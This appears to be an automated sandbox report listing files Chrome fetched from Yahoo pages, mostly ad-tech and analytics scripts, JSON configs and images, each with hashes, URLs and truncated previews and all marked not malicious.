                                                                                                                                                                                                                  Preview:window.wafer&&window.wafer.ready((function(){var e="show-drawer",t=null,a=null,r="wafer-fetch-error",i="wafer-fetch-complete",n="stream-related-drawer",o="StreamRelated",s="react-wafer-stream",c="json",d="wafer-fetch",l="stream-uuid-list",u=[],w=document.querySelectorAll(".stream-items"),m=window.innerWidth||document.documentElement.clientWidth,f="js-sponsored-moments-dwell-time",A=window.wafer&&window.wafer.utils,g={INARTICLE:9/16,reservemoments:16/9},p=function e(t){var a,r,i=t.getAttribute("data-da-position");if("reservemoments"===i&&(t=t.querySelector("#defaultRESERVEMOMENTS")),a=t.getAttribute("data-html"),r=t.getAttribute("data-darla-config"),a&&r){(r=JSON.parse(r)).dest;var n=window.DARLA.prefetched();if(!window.DARLA.config()||window.DARLA.inProgress()||n&&0!==n.length)setTimeout((function(){e(t)}),500);else{if(!r.h&&!r.w){var o=Math.floor(m*g[i]),s={flex:{h:{min:o},w:{min:m}},h:o,w:m};Object.assign(r,s)}var c=r.id;window.DARLA.addPos(r);var d=new window.DARLA.Response(c,{});a=
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (2146)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):2235
                                                                                                                                                                                                                  Entropy (8bit):5.648717360734648
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:41176B6A0F6706ABFE3C109BB07C7F0B
                                                                                                                                                                                                                  SHA1:E7D4D482275E2B86D21804DF702754413F694888
                                                                                                                                                                                                                  SHA-256:D005CEA69E05039893662CEA62A4F4E9778BFD69007E4F73F82C020C36432265
                                                                                                                                                                                                                  SHA-512:D3CB05F05C3F68CD796F7D08584EF635147EE0101967DE39CAA5EA89D6A76EB81A852131758B7165C42C4E4C9082DC00E9EDB50F7D16399613F088B7C088CDE8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://prebid.a-mo.net/isyn?gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1&s=pbs&cb=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Damx%26gdpr%3D0%26gdpr_consent%3D%26gpp%3DDBAA%26gpp_sid%3D-1%26f%3Db%26uid%3D%24UID
                                                                                                                                                                                                                  Preview:<script src="https://assets.a-mo.net/js/cframe.js#gdpr=0&gdpr_consent=&cc=US"></script>.<script>__am$CK(["https://x.bidswitch.net/sync?ssp=adaptmx&user_id=f40635db-dca3-40de-9df4-47b925a7ac2a&gdpr={{GDPR}}&gdpr_consent={{GDPR_CONSENT}}&us_privacy={{US_PRIVACY}}&gpp={{GPP_STRING}}&gpp_sid={{GPP_SID}}","https://pixel.rubiconproject.com/exchange/sync.php?p=pbs-adaptmx&gdpr={{GDPR}}&gdpr_consent={{GDPR_CONSENT}}&us_privacy={{US_PRIVACY}}","https://id.a-mx.com/u?&gdpr={{GDPR}}&gdpr_consent={{GDPR_CONSENT}}&us_privacy={{US_PRIVACY}}&gpp={{GPP_STRING}}&gpp_sid={{GPP_SID}}&cb=https%3A%2F%2Fsync.a-mo.net%2Fsetuid%3FA%3Df40635db-dca3-40de-9df4-47b925a7ac2a%26bidder%3Damx_com%26uid%3D","https://rtb.openx.net/sync/prebid?&gdpr={{GDPR}}&gdpr_consent={{GDPR_CONSENT}}&us_privacy={{US_PRIVACY}}&r=https%3A%2F%2Fsync.a-mo.net%2Fsetuid%3FA%3Df40635db-dca3-40de-9df4-47b925a7ac2a%26bidder%3Dopenx%26uid%3D%24%7BUID%7D","https://cm.adform.net/cookie?&gdpr={{GDPR}}&gdpr_consent={{GDPR_CONSENT}}&us_privacy={{U
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):48269
                                                                                                                                                                                                                  Entropy (8bit):4.162628750394423
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:2FF8039AAC72DA3FC83FBA1B284BAA45
                                                                                                                                                                                                                  SHA1:040E20D71BDCA7AB88AA543178770C55020ED33B
                                                                                                                                                                                                                  SHA-256:BF4698D774243337F18C174D8551304E8618ECCE825AADB7E9671BDD56EC5A50
                                                                                                                                                                                                                  SHA-512:D11081C236AB2C31CFE286BA293E0586EECE7B3ED6872EBAE74C56DC0E40FE7DE24F9D000C04EE19F516F0E273AFE8645325400ECABA68429513732EF8ADFC9C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/eh/prebid-config/bp-yahoo_login.json
                                                                                                                                                                                                                  Preview:{. "brandProtection": {. "badv": {. "1111.com.tw": true,. "1keygou.com": true,. "3oaksorchard.com": true,. "43cbd.com": true,. "4everstamp.com": true,. "aax.com": true,. "abloodsugaroption.com": true,. "abra.com": true,. "accessmediaportal.com": true,. "acebarry.com": true,. "acticatin.com": true,. "actiongamesplace.com": true,. "actualitateavranceana.ro": true,. "adameve.com": true,. "adblocker.vpnwelt.com": true,. "aditore.com": true,. "adlock.com": true,. "adpushup.com": true,. "adremover.com": true,. "adremover.org": true,. "adrenal.ru": true,. "adriangadea.ro": true,. "adrianvigheciu.ro": true,. "adroll.com": true,. "ads.google.com": true,. "ads.sharebeast.com": true,. "adsterra.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15264)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):15697
                                                                                                                                                                                                                  Entropy (8bit):5.53729719471769
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:E2202E6ED6EF52CEC2C4A875C99225BA
                                                                                                                                                                                                                  SHA1:FD48D3157CFA6B6E6FEC3E50787E357AA3288C88
                                                                                                                                                                                                                  SHA-256:F2CFBD195DFF011843F93E2D32979F6F07926211CBF3EDDDC3B708B0BB04C8A2
                                                                                                                                                                                                                  SHA-512:4E2AEFD87D89F4D5C00CFCAC8EE2D7748F84979BE9E66272475A621A19BA8FC884737DF604B3B7344FE4EB0C1154819880BC3769E25798BB4ABDDEF76EDC9B4F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://www.yahoo.com/__rapid-worker-1.2.js
                                                                                                                                                                                                                  Preview:/* @preserve. * $Id: rawdeflate.js,v 0.3 2009/03/01 19:05:05 dankogai Exp dankogai $. *. * Original:. * http://www.onicos.com/staff/iz/amuse/javascript/expert/deflate.txt. */./* @preserve. * Copyright (C) 1999 Masanao Izumo <iz@onicos.co.jp>. * Version: 1.0.1. * LastModified: Dec 25 1999. */./**. * @preserve This code contains an altered version of the original source and is not meant to misrepresent the original software.. */.function base64(r){if("undefined"!=typeof btoa)return btoa(r);for(var t,e,n,f,o,i,a,l="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",u=[],s=0;r.length>s;)t=r.charCodeAt(s++),e=r.charCodeAt(s++),n=r.charCodeAt(s++),f=t>>2,o=(3&t)<<4|e>>4,i=(15&e)<<2|n>>6,a=63&n,isNaN(e)?i=a=64:isNaN(n)&&(a=64),u.push(l.charAt(f)+l.charAt(o)+l.charAt(i)+l.charAt(a));return u.join("")}function lzw_encode(r){for(var t,e={},n=(r+"").split(""),f=[],o=n[0],i=256,a=n.length,l=1;a>l;l++)t=n[l],null!=e[o+t]?o+=t:(f.push(o.length>1?e[o]:o.charCodeAt(0)),e[o+t]=i,i++,o
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (64662)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):103415
                                                                                                                                                                                                                  Entropy (8bit):5.333954900515722
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:E1FCDBADCA0544111B9BFE5BA59C3086
                                                                                                                                                                                                                  SHA1:A98B55B20E8FE4B8C27A74A2C37BFDC5C5EC93E6
                                                                                                                                                                                                                  SHA-256:974489C9DE5D32D3F539F2D6B70E9B2E1F6AE40B618254C533C8BB087A9B1707
                                                                                                                                                                                                                  SHA-512:F09382845B5C5C325DC57D3D13A302BB54F4C53C5DD34F819476C1D505DC21FBCD98E39C270A2F33E7E54CDAE670C241213363BE1A1CBEAC8D01445A82EC5B46
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/du/ay/wnsrvbjmeprtfrnfx.js
                                                                                                                                                                                                                  Preview:window.assertive = {. entityId: "wnsrvBJmEPrTfrnFX",. analytics: {. sampleRate: 0.05,. integrations: {. ivt: false,. },. logUnfilled: true,. useHistoryChangeTrigger: true,. override: {. normalizeSlotId: function (slotId) {. return slotId.replace(. /-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/,. "". );. },. },. },. floor: {. enabled: true,. addToHashKey: false,. currency: "USD",. optimizeThreshold: 'm_0.2',. optimizePrebidThreshold: '1st_1.4',. exploreRate: 0.05,. limit: {. percentage: 0.95,. },. prebid: true,. aps: false,. priceBuckets: [. { min: 0, max: 2, increment: 0.01 },. { min: 2, max: 3, increment: 0.05 },. ],. },.};../**. * Assertive Yield. * v2.33.4. *. * . 2018-2024 Assertive Yield B.V. All Rights Reserved.. */.!function(){function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:fu
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, WAVE audio, IEEE Float, stereo 44100 Hz
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):189160
                                                                                                                                                                                                                  Entropy (8bit):7.422217355234855
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:8ABFE6DFA7B0D9A5A4B7268155054740
                                                                                                                                                                                                                  SHA1:FE841D96C94923C7732014A81BCB574FE2C10584
                                                                                                                                                                                                                  SHA-256:75799B61C8D93B46365AE3A603EF508ACEE921ADBF2ABF4ADA583FC4E0E4BB82
                                                                                                                                                                                                                  SHA-512:A6A475C64D5E0BC3CB94BD38B38DA66F5B4470F50738286F2D42030D2E32EF15D6C795DFA8DA36502E536819DABABE9386CA7419F2C6CB0E8580053ACE1166D4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/pv/static/misc/voice-start-202105050733.wav:2f823ded1e2838:0
                                                                                                                                                                                                                  Preview:RIFF....WAVEfmt ........D... b.... .datah...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):51537
                                                                                                                                                                                                                  Entropy (8bit):7.958608332135635
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:47526BBD8BE26C495968A5EA8422CD5B
                                                                                                                                                                                                                  SHA1:3DF468D9104F01C12E5F6A3043E6AE1F19B31A04
                                                                                                                                                                                                                  SHA-256:05F4E6DF7D4A278B75010F21982885555615A33F73095C0957E1286E382B9779
                                                                                                                                                                                                                  SHA-512:8436E9D695A67BEB9DF8483AF52E9F9A1A153F7627DB86836C5FCB5F55E69CC385A5CF74DD0E16461540FB8DD6EAF1C24FF2538326C6D51A7518A230E212B3E4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF.............@ICC_PROFILE......0ADBE....mntrRGB XYZ .........3.;acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 2000 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../.......C....................................................................C......................................................................................................................G..........................!1A.."Q.aq.2...#B...$3R...b..CSr..%4c...D..................................&......................!1...A....3a2.............?..).K..%.C....G.._....n.o.x..KDF^}.....#...\8.s...eT<j.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):22021
                                                                                                                                                                                                                  Entropy (8bit):7.962253222659651
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:47E9ADD512152506C63BFE6180BF45A8
                                                                                                                                                                                                                  SHA1:1420E7AA0DED8BF16B2B27109733B0A5BD35C8F7
                                                                                                                                                                                                                  SHA-256:5B43466016887310785C80770AFAE86AB60D0BF72325B4D6C2D0DFBBE704411F
                                                                                                                                                                                                                  SHA-512:6941AB4B000C044E58685CE72DD5729DA565724C54BC44E6E48023455220055FF35338FE7816AE582A5D2FAB57906CF579F6F1485F4A8286547740BFB5ABE824
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/1m10s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/1m10s/match/image.jpeg*~hmac=5c1989224cea551e949b15c79b4c95768a4fae12bca5315f9b431eb7e295ee02
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C........................... ."" ...$(4,$&1'..-=-157:::#+?D?8C49:7...C...........7%.%77777777777777777777777777777777777777777777777777..........."........................................L.........................!1..AQaq"...2....#BR..3Cbr..$....SU...%Tc.4Dds.................................)......................!.1..AQ"a.2.BRq..............?...}..I#.|9<QJ...Yg..d..7.(=O...h$m..z.....~5...x...1.t&+.EU.?.T[...6.=.?w.~u.L...g.nOA1K.....8.g..{t..23.....}j..1.'....]...pZ...1........ry?.U.sG$..l....o..Y.6T.J......QI..'N..I8.>.:<H......#5.L.(.......K....3.N.T.}..v...h.k.L..].&....)@.m....m..&)B.....]jVv.l......M.-b..lpL}N+'..]6tC..5j$..iZ@..*}.&....R.`...>DS.XO..r`.\..R..4;.....,2...&....A<....7^v..g..y<.p....RV\..j.F.,.V.nQ...q..Q......[...s....D|.8...$.@...|.\.........;]H.wr...>M.>...f....X....?.\...4j.V....v*5...+He... ..|s.Rmf..Y.$...EvC,'.9..G..].....J.I...N.H.#...S.MN..Od.]..v...LU..+.E....<Wb...P...m....-..h.......m
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 29, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                  Entropy (8bit):4.068159130770306
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:B08B284E4EDFC64C8B030EDA4B2AB487
                                                                                                                                                                                                                  SHA1:A758B60B2DFFA5470AC44EC73DC1FB5BB22443EC
                                                                                                                                                                                                                  SHA-256:F038FC37D988226072ABCF4BA6D51775BACF910621C3136B7B07A100B5D6943A
                                                                                                                                                                                                                  SHA-512:4C3AA6B16F6AF29F627462D816EED9A5A3C2880684D2AEC99DF3AC078829656EB25B02EA26F4A216F389737289B79B805DCDE52D81527454F505A6A1C89B6743
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............Z5.c....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):8688
                                                                                                                                                                                                                  Entropy (8bit):7.855797069056082
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:7CBFE5220756DCAA71A19C56F546D717
                                                                                                                                                                                                                  SHA1:2123FA3D5D01CE1A157B9A6D979DE56346678B9C
                                                                                                                                                                                                                  SHA-256:96570ECF5F823F416A317F807E2D68FBE68E11D65EFFBD6E17E73E3CC5FB26AD
                                                                                                                                                                                                                  SHA-512:D35469CE6F771009E37049FD676E7AEB763CAAC1ADF22D1D7C0049D76B9990583DC1894D2D09E078FA711F43BFCF2B075996EB05A1025A97FD2D507671268592
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/45s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/45s/match/image.jpeg*~hmac=9841ac958ff56606a4355d6e2b4e733ecb721c5373a14a289ba0c3d6f715d209
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C....................................#,%.!*!..&4'*./121.%6:60:,010...C...........0 . 00000000000000000000000000000000000000000000000000..........."........................................C........................!..1Q..A."Saq.2..BRb.#3r..$4Ct....6Dc..................................#........................!1AQ.a...............?...........................................................................................................{.;...........kJ.J..:.>...Q..za.....S.aN..1..TkI%.c.........T..-...r./.R.. ....j}6.._....T.U|...U\..'..[..n...8.MAt.......a..c.U..uE.....~.^<...=z}..o..P...;.O.V....r..E=.v.t..G.6a....o5K+.......T...K.R...z,.|..3...YT...y...sx..,.*..e.}JGV.;..P.R.\...,.X.%..w..G...W.....+J..9*o..%.\.....O.o...u...R.#))S|.,.....\o.fq.n..K..."._...a....0....N..^..Tb.M..n..K}........j:.....c.o..K.r.._,.M2,..5...(U....(.xnS.c..3.I>_..V.{l.b.V.m.....*P|.+J1..r.{nLu.N*j:..S.jI*.....=..,?..Ma......./.....<.o.#..GC.\
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2145)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):2173
                                                                                                                                                                                                                  Entropy (8bit):5.235067502413046
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:C8735EBD5347ADC3ADE546950E4AC315
                                                                                                                                                                                                                  SHA1:926A0A63A7360901AB76EF07D67C6F314A374365
                                                                                                                                                                                                                  SHA-256:8193231C030769D84B5A7ADDED147D4EA19C87CEB44EF863756E37CC1B2E5193
                                                                                                                                                                                                                  SHA-512:0770BBD4513AA2994B11974B865FAD9DAC9EF60C52D8F68C75F4285584BBA65D856EB2E152FF37B259E955AD7FB9242317C0419286B47922150011842023FDDB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://cdn.taboola.com/libtrc/google-topics-api.20241001-19-RELEASE.es6.js
                                                                                                                                                                                                                  Preview:/*! 20241001-19-RELEASE */..(o=>{const e="top",t="https://cdn.taboola.com",i="http://localhost:9876",n=`${t}/libtrc/static/topics/taboola-browsing-topics.html`,r=`tbl-browsing-topics-iframe-${100*Math.random()}`;function s(){try{if(!TRC.topics)return;c(TRC.topics)}catch(o){__trcWarn(`failed to save handed Google Topics at local storage: ${o.message}`)}}function c(o){try{const t=a()||[];for(let e=0;e<o.length;e++){const i=o[e],n=t.some(o=>o.topic===i.topic);if(!n){const o={topic:i.topic,taxonomy:i.taxonomyVersion,model:i.modelVersion,config:i.configVersion,version:i.version};t.push(o)}}if(!t.length)return;TRC.pageManager.storeValue(e,JSON.stringify(t)),m()}catch(o){__trcWarn(`failed to save Google Topics at local storage: ${o.message}`)}}function a(){let o,t;try{if((t=(o=TRC.pageManager.getValue(e))?JSON.parse(o):null)&&t.length>0){const o=l(t);return o}}catch(o){__trcWarn(`failed to read Google Topics from local storage: ${o.message}`)}}function l(o){let t=!1;return o.forEach((e,i)=>{(
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):131810
                                                                                                                                                                                                                  Entropy (8bit):5.536670706045521
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:F26DD136964270DA972A49DBE659CB72
                                                                                                                                                                                                                  SHA1:0505D76DE6993F726703C1D00A7543583382E72B
                                                                                                                                                                                                                  SHA-256:148A898CFB8D86F0D656CB543C556846591825204ABD25710610CDAAC0CC4B59
                                                                                                                                                                                                                  SHA-512:CF18891E353244454468B3F2EB38960AC2602BA4AFA1962BF50CB2AFAF70A7963E74AFD9DE106FC93F56023E48BB251630A3615DFE41615B2BB738B540E2CD44
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:"https://www.yahoo.com/caas/content/article/?uuid=7aae058d-8696-37ea-9364-e2b603b82437,f0262557-5186-3d6e-913d-df2cba992b2f,649d33cb-a9f4-3936-8099-7930764ca51c&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=TNBE003,USNELT-ReactInRMP-commerce-ctrl-1004,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=64cl5gdjfvvgt"
                                                                                                                                                                                                                  Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"culture","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a0W00000HBPoVQAX;revsp:usa_today_news_641;lpstaid:7aae058d-8696-37ea-9364-e2b603b82437;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"School_bus;Dulzura,_userfornia;U.S._Customs_and_Border_Protection;Superintendent_%28education%29;userfornia;Transit_bus;San_Diego;USA_Today;Southern_userfornia;School_district\" ctopid=\"1996000\" hashtag=\"1996000\" rs=\"lmsid:a0a0W00000HBPoVQAX;revsp:usa_today_news_641;lpstaid:7aae058d-8696-37ea-9364-e2b603b82437;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"news","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=woman-met-group-migrants-school-091146294","canonicalSite":"news","canonicalUrl":"https://www.usatoday.com/story/news/investigations/2024/10/04/san-diego-school-bus-hijacking-fact-check/75477299007/","cat
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7907), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):7907
                                                                                                                                                                                                                  Entropy (8bit):5.134832253452516
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:85070595D47A7CC86AF31833110DC18A
                                                                                                                                                                                                                  SHA1:13564B6787EE765D841B2B6D1C4A6E73A2553AF8
                                                                                                                                                                                                                  SHA-256:79D954B80C39513A18EE1E0143D931BA9222B4C4794438F7BAD23F9E0380CDC8
                                                                                                                                                                                                                  SHA-512:B89211958F1EC914F3C31363EC7A60EFF460A86EAEF594522FD11A75712E0D0B05918C1D3FC720DD5D970399CD59C45E2F0069C5A9AE8014253661A2CEDABD38
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/wf/wf-template-1.4.3-modern.js
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-template",[],t):"object"==typeof exports?exports["wafer-template"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-template"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function"
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65255)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):286543
                                                                                                                                                                                                                  Entropy (8bit):5.5613224138328
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:9D0850F9B6B5F538E5E1289BE3377F7C
                                                                                                                                                                                                                  SHA1:70359C53F7A389EBD19FF48D02DC062DD866D356
                                                                                                                                                                                                                  SHA-256:3015D360D8DEC4C445BC0DD69AAAE1019F1C0E6834094CC32DF00948C98995F7
                                                                                                                                                                                                                  SHA-512:7BE01659035E602F75FDCEA42FB57814889A402F3D5B515621864DB10F9DC8EF4FFD4E9C80C16C1A369FF8E63D25FB696498303AA29F93EA6E267D054E7638FD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:/*! For license information please see evplayer.js.LICENSE.txt */.(()=>{var t={1556:function(t,e){"use strict";var i=this&&this.__spreadArrays||function(){for(var t=0,e=0,i=arguments.length;e<i;e++)t+=arguments[e].length;var s=Array(t),n=0;for(e=0;e<i;e++)for(var r=arguments[e],o=0,a=r.length;o<a;o++,n++)s[n]=r[o];return s};Object.defineProperty(e,"__esModule",{value:!0});var s=function(){function t(t){void 0===t&&(t="anonymous"),this.name=t,this.l={},this.u=0}return t.prototype.destroy=function(){this.l={}},t.prototype.addEventListener=function(t,e,i){return this.l?this.p(t,e,i):""},t.prototype.addEventListeners=function(t,e,i){var s=this,n={};return this.l&&t.length?(t.forEach((function(t){var r=e.bind(i,t);n[t]=s.p(t,r,i)})),n):n},t.prototype.on=function(t,e,i){return Array.isArray(t)?this.addEventListeners(t,e,i):this.addEventListener(t,e,i)},t.prototype.removeEventListener=function(t,e){this.l&&t in this.l&&Object.prototype.hasOwnProperty.call(this.l[t],e)&&delete this.l[t][e]},t.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):105664
                                                                                                                                                                                                                  Entropy (8bit):7.998431822154747
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:8EB65C1A0C97E057CA48E0075DD9A871
                                                                                                                                                                                                                  SHA1:975AB7F1059BA03297C0C231E2E15350045AD9F5
                                                                                                                                                                                                                  SHA-256:318C0B507E524725AA7C9E349743567652F07E9FAE25018BC88C00E7D5E6C429
                                                                                                                                                                                                                  SHA-512:CB43FC9A16A40DBA0C03F647516CE6AD9B1CC05A3F59C54C65034A3AB0DF07E743C5CF85549D1EAAAB148567B1F448FD3F26C1ABBB96F873F0EFF87D96A9088D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
